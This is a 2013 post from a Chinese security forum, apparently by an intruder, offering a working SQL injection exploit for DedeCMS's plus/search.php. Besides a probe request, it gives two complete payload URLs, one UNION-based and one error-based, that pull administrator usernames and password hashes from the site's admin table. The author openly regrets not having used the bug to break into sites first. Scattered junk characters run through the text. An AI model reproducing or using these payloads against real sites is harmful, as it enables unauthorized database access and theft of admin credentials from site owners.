找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2340|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
' F+ T. |7 c- G& B0 R
: \; K2 r% k5 {% M, ~# F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
  C5 T2 t4 u1 _  g1 s' T
0 P# N4 L( G" U3 D* l# Z既然已经发出来了,我就把我自己搞的exp发下吧。。唉。9 o' W% P1 g6 q# |
  S3 r' Z4 [. K* P  p
我一般是这样测试的:8 u7 g1 |. d5 f' ?+ W6 `' x
$ X. Z$ ^! x5 W5 }4 t; S9 s
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
- F( i/ R* e& ]2 x' Y& q0 G" y+ d
' m4 B! g* r  s0 U转载不加作者名的没JJ' D( U3 w# R. f

6 I" b! [4 U# b# h' P2 _# T) f  |作者:鬼哥$ e( y& ~4 {) M' g9 ^( i, N$ f  `

$ k6 x/ C. P$ \, F( ]9 T! R 3 A* c4 c4 X1 W2 j$ }4 c1 r& D9 \
/ f$ y% y* i) u9 [2 P0 A* n
看结果如果提示1 @! _/ |: }3 v, h
% v$ |( y: \* B, u8 ], {* K; R
Safe Alert: Request Error step 2 !; J) [+ q3 D. o0 Q1 R5 V5 q
; Q2 o8 }* @( W' T, X) C
那么直接用下面的exp
- l; `: T* q6 _8 U3 E3 d! I( s+ x
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a5 A/ d; t9 n$ D
0 {. X. I# q- n# M

! @4 t3 }6 R9 I0 l+ L0 I看结果如果提示
, V$ l. K$ U: t8 }# V
- Y" }9 b/ W4 R, {6 d9 Q' Y$ ~7 ?Safe Alert: Request Error step 1 !, O- J1 o  N( R0 `/ P0 @5 x; V7 ?0 {6 A

% S9 k, R( ~- P# [$ l那么直接用下面的exp
% J3 a( u  h1 m9 r; @8 a* E
9 @+ V3 n4 G& S% W4 }xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a$ Z! A5 ]$ E, q$ m4 U8 X# _4 k4 k
4 [8 P; v; y- W
0 K. h- w, |2 P& ^1 A5 T
如果正常显示证明漏洞不存在了。- y! M& l1 o; O

* ^9 K& c3 k7 i* P' ?# z8 K转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表